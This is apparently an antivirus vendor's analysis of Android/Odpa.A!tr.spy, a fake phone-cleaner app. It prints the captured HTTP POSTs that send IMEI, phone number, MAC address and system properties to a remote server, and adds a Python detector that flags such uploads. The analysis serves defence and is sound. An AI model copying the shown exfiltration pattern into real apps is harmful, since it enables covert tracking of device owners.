Android/Odpa.A!tr.spy
Analysis
Android/Odpa.A!tr.spy is malware that targets Android mobile devices and sends detailed device information to a remote server.
Technical Details
The malware comes packaged as cn.com.opda.android.clearmaster, an application that claims to clean up the smartphone (cache removal, history removal, batch removal of applications, etc.).
However, at startup the sample sends a detailed device profile to a remote server via HTTP POST:
POST /app/update HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip,deflate
Charset: utf-8
Content-Type: multipart/form-data; boundary=---------7d4a6d158c9
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; sdk Build/KK)
Host: [CENSORED]kx.net
Content-Length: 873

-----------7d4a6d158c9
Content-Disposition: form-data; name="json"

{"device":{"info":{"model":"sdk","vendor":"unknown","product_name":"","secure":1,"bootloader":"unknown","kernel":"3.4.0-gd853d22\nnnk@nnk )","board":"","tel_number":"15555215554","cid":"","build_product":"generic","version":"","baseband":"unknown","model_internal":"","description":"sdk-eng 4.4.2 KK 938007 test-keys","sim_operator":"XXXYZ","product_brand":"generic","product_board":"","build_id":"KK","keyboards_devname":"","sdk":"19","device_width":768,"device_height":1184,"product_device":"generic","release":"4.4.2","identifier":""}},"wifimac":"","configversion":1000,"locale":"en","imei":"000000000000000"}
In a second POST, it sends the values of numerous system properties to the remote server:
POST /device/model_miss HTTP/1.1
...
{"device":{"prop":{"ro.product.manufacturer":"unknown","ro.product.brand":"generic","ro.carrier":"","ro.product.model":"sdk",
The system properties which are sent are:
- ro.baseband
- ro.board.platform
- ro.bootloader
- ro.build.id
- ro.build.version.sdk
- ro.build.version.release
- ro.build.description
- ro.build.product
- ro.carrier
- ro.chipname
- ro.cid
- ro.hardware
- ro.htc.common.version
- ro.modversion
- ro.model.internal
- ro.product.version
- ro.product.board
- ro.product.device
- ro.product.name
- ro.product.manufacturer
- ro.product.brand
- ro.product.model
- ro.serialno
- ro.semc.product.name
- gsm.sim.operator.numeric.2
- hw.keyboards.0.devname
Besides system properties, the sample also sends:
- phone number
- IMEI
- MAC address
- indication whether the device is rooted or not ("secure")
- carrier name
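An analyst who has captured this traffic will want to flag such uploads automatically rather than read each JSON blob by hand. The Python below is an added example, not code from the original analysis and not code from the sample: it parses a raw multipart/form-data POST, extracts the "json" form field and reports which device identifiers (IMEI, phone number, MAC address, root flag, SIM operator, serial number) it carries, at any nesting depth, so the same check covers both the /app/update and the /device/model_miss uploads. The requests it runs on are constructed to mirror the two captures above; the host c2.example.invalid, the boundary and every value are placeholders, not data from a real device.

```python
"""Flag device-identifier exfiltration in captured multipart POSTs.

Added example, not code from the original analysis or from the sample.
All requests below are constructed test data with placeholder values.
"""
import json
import re

# Identifiers whose presence in an outbound JSON upload warrants an alert.
# Names follow the fields seen in the captured /app/update and
# /device/model_miss requests.
SENSITIVE_KEYS = {
    "imei",                        # hardware identifier
    "tel_number",                  # phone number
    "wifimac",                     # Wi-Fi MAC address
    "secure",                      # rooted-or-not indicator
    "sim_operator",                # carrier
    "ro.serialno",                 # device serial from system properties
    "gsm.sim.operator.numeric.2",  # SIM operator code from system properties
}


def make_post(path, json_text):
    """Build a multipart POST of the captured shape (constructed test data)."""
    boundary = "---------7d4a6d158c9"  # header form; body delimiter is "--" + boundary
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        "User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; sdk Build/KK)\r\n"
        "Host: c2.example.invalid\r\n"          # placeholder host
        "\r\n"
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="json"\r\n'
        "\r\n"
        f"{json_text}\r\n"
        f"--{boundary}--\r\n"
    )


SAMPLE_UPDATE_POST = make_post(
    "/app/update",
    '{"device":{"info":{"model":"sdk","secure":1,"tel_number":"15555215554",'
    '"sdk":"19"}},"wifimac":"","configversion":1000,"locale":"en",'
    '"imei":"000000000000000"}')
SAMPLE_PROP_POST = make_post(
    "/device/model_miss",
    '{"device":{"prop":{"ro.product.model":"sdk","ro.serialno":"PLACEHOLDER01",'
    '"gsm.sim.operator.numeric.2":"00000"}}}')
# Same shape, but carrying nothing sensitive: must not raise an alert.
SAMPLE_BENIGN_POST = make_post("/app/update", '{"configversion":1000,"locale":"en"}')


def split_http_request(raw):
    """Return (request_line, {lowercase header: value}, body) for a raw HTTP/1.1 request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def multipart_fields(headers, body):
    """Parse a multipart/form-data body into {field name: raw value}."""
    match = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if not match:
        return {}
    delimiter = "--" + match.group(1)
    fields = {}
    for part in body.split(delimiter):
        part = part.strip("\r\n")
        if not part or part == "--":   # preamble before first part / closing delimiter
            continue
        part_head, _, value = part.partition("\r\n\r\n")
        # lookbehind keeps 'filename="..."' from being mistaken for the field name
        name = re.search(r'(?<![A-Za-z])name="([^"]*)"', part_head)
        if name:
            fields[name.group(1)] = value
    return fields


def collect_sensitive(obj, hits=None):
    """Walk nested JSON and gather SENSITIVE_KEYS at any depth (keys may contain dots)."""
    if hits is None:
        hits = {}
    if isinstance(obj, dict):
        for key, value in obj.items():
            if key in SENSITIVE_KEYS and not isinstance(value, (dict, list)):
                hits[key] = value
            collect_sensitive(value, hits)
    elif isinstance(obj, list):
        for item in obj:
            collect_sensitive(item, hits)
    return hits


def find_exfiltrated(raw_request):
    """Return {sensitive key: value} carried in the 'json' form field of a POST."""
    request_line, headers, body = split_http_request(raw_request)
    if not request_line.startswith("POST "):
        return {}
    fields = multipart_fields(headers, body)
    if "json" not in fields:
        return {}
    try:
        data = json.loads(fields["json"])
    except json.JSONDecodeError:
        return {}
    return collect_sensitive(data)


def is_device_profile_upload(raw_request, threshold=2):
    """Alert when one POST carries at least `threshold` sensitive identifiers."""
    return len(find_exfiltrated(raw_request)) >= threshold


if __name__ == "__main__":
    for label, sample in (("update", SAMPLE_UPDATE_POST),
                          ("model_miss", SAMPLE_PROP_POST),
                          ("benign", SAMPLE_BENIGN_POST)):
        print(label, is_device_profile_upload(sample), find_exfiltrated(sample))
```

The threshold of two identifiers is a deliberate choice: a single field such as "locale" or a bare model name appears in plenty of legitimate update checks, whereas IMEI plus phone number plus MAC address in one upload is the profile this sample builds. Keys are matched by name at any depth because the two captures nest them differently ("device.info" versus "device.prop", with the latter using dotted property names as literal keys).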
The APK contains the following files:
- ./META-INF/CERT.RSA
- ./META-INF/MANIFEST.MF
- ./META-INF/CERT.SF
- ./AndroidManifest.xml
- ./resources.arsc
- ./classes.dex
- several resources
- ./assets/filepath.db: a database of application package names with their paths
- ./assets/RemoteTools.jar
It also embeds the following third-party SDKs:
- Google Ads
- Android Support v4
- Umeng
The malware asks for the following permissions:
- READ_CONTACTS
- ACCESS_WIFI_STATE
- READ_LOGS
- INTERNET
- VIBRATE: used when a cleaning of the smartphone is triggered.
- READ_HISTORY_BOOKMARKS
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
Product | Database
---|---
FortiGate | Extreme
FortiClient | Extended
FortiMail | Extended
FortiSandbox | Extended
FortiWeb | Extended
Web Application Firewall | Extended
FortiIsolator | Extended
FortiDeceptor | Extended
FortiEDR |